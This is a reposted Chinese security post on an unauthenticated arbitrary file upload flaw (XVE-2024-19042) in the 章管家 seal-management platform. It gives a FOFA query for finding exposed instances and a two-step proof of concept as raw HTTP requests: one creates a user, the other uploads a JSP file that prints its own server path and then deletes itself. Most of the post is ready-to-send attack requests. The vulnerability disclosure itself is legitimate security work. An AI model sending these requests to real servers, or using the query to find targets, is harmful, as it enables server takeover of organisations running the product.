章管家前台任意文件上传漏洞(XVE-2024-19042)
章管家是上海建业信息科技股份有限公司推出的一款针对传统印章风险管理提供的整套解决方案的工具。 该系统存在前台任意文件上传漏洞,攻击者成功利用该漏洞可以上传任意文件,从而获得服务器权限。
fofa
app="章管家-印章智慧管理平台"
poc
新建用户
POST /api/personSeal_jdy/saveUser.htm HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sid=ed467a70-91e9-450d-a2c1-db1fab8123ad
Connection: close
Content-Type: application/json
Content-Length: 211
{"op":{},"data":{"mobile":"13333333333","uid":"13333333333","password":"12345
6","name":"testuser","return_url":"https://www.baidu.com","apisecretkey":"1","_id
":"1","mail_address":"[email protected]"},"b7o4ntosbfp":"="}
2、获取 Cookie ,上传文件
POST /seal/sealApply/uploadFileByChunks.htm?token=dingtalk_token&person_id=40288053800311e80180261b92ab005e&chunk=1&chunks=1&guid=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0)
Gecko/20100101 Firefox/128.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language:
zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: sid=58139d92-115f-4e9b-99a1-ee200a8b17a0;
ZHANGIN_CHECKBOX=false; ZHANGIN_MOBILE=;JSESSIONID=30A3F3F324080E3B327FEB2EB82E2CB0
Content-Type: multipart/form-data; boundary=--------952870761
Content-Length: 140
----------952870761
Content-Disposition: form-data; name="file"; filename="1.jsp"
Content-Type: image/jpeg
<%@ page import= "java.io.File" %>
<%
out.println("111");
String filePath = application.getRealPath(request.getServletPath());
out.println(filePath);
new File(filePath).delete();
%>
----------952870761--
原文始发于微信公众号(0xh4ck3r):章管家前台任意文件上传漏洞(XVE-2024-19042)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论